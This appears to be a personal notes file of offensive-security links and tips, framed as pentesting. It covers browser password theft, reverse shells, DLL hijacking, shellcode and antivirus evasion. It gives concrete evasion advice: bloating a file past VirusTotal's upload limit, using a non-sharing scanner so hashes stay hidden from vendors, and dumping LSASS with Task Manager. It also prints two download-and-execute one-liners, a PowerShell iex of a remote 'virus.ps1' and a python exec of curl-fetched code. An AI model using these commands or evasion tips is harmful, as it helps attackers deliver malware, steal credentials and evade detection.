# Tips

Tip: append a very large number of zero bytes to the end of the file to push its size above 700MB; VirusTotal's upload size limit is 650MB.

https://cookiearena.org/case-study/phan-tich-ma-doc-tan-cong-doanh-nghiep-ban-hang-online/

VirusTotal tells on you: if it detects our software as malicious, it shares the hash with all the other known AV vendors. This is good for users but not for pentesters. So antiscan.me is a better choice (although that tool is also very good at squeezing money out of you).

https://quantrimang.com/cong-nghe/trojan-gia-lam-pdf-bang-phuong-phap-rlo-195731 fake pdf (anti virus blocked)

https://viblo.asia/p/bypass-powershell-execution-policies-tren-windows-MG24BrER4z3 (this technique disables common antivirus software)

```
powershell -nop -c "iex (New-Object Net.WebClient).DownloadString ('http://10.0.37.216:8080/virus.ps1')"
```

```
python -c "`curl https://raw.githubusercontent.com/Shengpy/test/main/a.py`"
```

## password stealing from browser

https://drx.home.blog/2018/07/20/tu-viet-chuong-trinh-danh-cap-password-duoc-luu-trong-chrome-bang-python/#more-122

https://github.com/ohyicong/decrypt-chrome-passwords

## Reverse shell

https://systemweakness.com/ms-word-macros-with-powercat-reverse-shell-58b20983e0f0

https://www.hackingarticles.in/powershell-for-pentester-windows-reverse-shell/

## dll hijacking

https://crypt0ace.github.io/posts/DLL-Sideloading/

https://sec.vnpt.vn/2023/04/dll-proxying-for-persistence/

https://viblo.asia/p/share-libraries-hijacking-tren-linux-gAm5yEVX5db

iso

https://blog.sunggwanchoi.com/recreating-an-iso-payload-for-fun-and-no-profit/

## Powershell

https://medium.com/@huseyin.eksi/powershell-security-7039d73e32fd

https://github.com/PowerShellMafia/PowerSploit

## Shellcode injection

https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/

# bypass antivirus

https://viblo.asia/p/cac-phuong-phap-bypass-av-co-ban-bWrZnQgvKxw?fbclid=IwAR0eoXpUIZRrPgTTEargMDwlJyrsBSkOQEuAsjPxP0ZAUzOrRAsezbyG7tM

https://topdev.vn/blog/huong-dan-cai-dat-clamav-tren-linux-de-quet-virus-malware-trojan/

https://0xdf.gitlab.io/2020/02/01/htb-re.html

https://github.com/danielbohannon/Invoke-Obfuscation (powershell obfuscation)

https://anonyviet.com/cach-hacker-bypass-av-xam-nhap-windows-voi-autoit/

https://www.batch-obfuscator.tk/

https://anonyviet.com/minh-da-bypass-av-xam-nhap-windows-10-voi-metasploit-va-python-nhu-the-nao/

https://docs.google.com/presentation/d/1Fdcbv9U1qywIZSl2AhXJAlx61pyEITKfcbbwpJMvkcQ/edit#slide=id.g8d8b1cad0d_1_27

1. Use non-malicious software in malicious ways (preferred)
   - Instead of Metasploit's psexec implementation, use PsExec.exe from Microsoft
   - Instead of Mimikatz.exe, dump LSASS memory with Task Manager and extract passwords elsewhere
   - Instead of hashdump, save out registry hives and extract hashes elsewhere
   - Instead of meterpreter (at first), use SSH, Remote Desktop, mRemote-NG, TeamViewer, etc.
2. Add extra strings (from legitimate software) to increase the "goodness" score

# Assembly shellcode

- Create a Shell_Bind_TCP Shellcode: https://bohansec.com/2020/08/27/SLAE32-Assignment1/
- Create a Shell_Reverse_TCP Shellcode: https://bohansec.com/2020/08/30/SLAE32-Assignment2/
- Egg hunter (jump to that shellcode address and execute): https://bohansec.com/2020/09/01/SLAE32-Assignment3/
- Encoding schema: https://bohansec.com/2020/09/05/SLAE32-Assignment4/
- Take up at least 3 shellcode examples created using msfvenom for linux x86: https://bohansec.com/2020/09/18/SLAE32-Assignment5/
- Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching: https://bohansec.com/2020/09/27/SLAE32-Assignment6/
- Create a custom crypter like the one shown in the "crypters" video: https://bohansec.com/2020/09/29/SLAE32-Assignment7/

# Read more

https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking

https://n1ght-w0lf.github.io/categories/#malware-analysis

https://crypt0ace.github.io/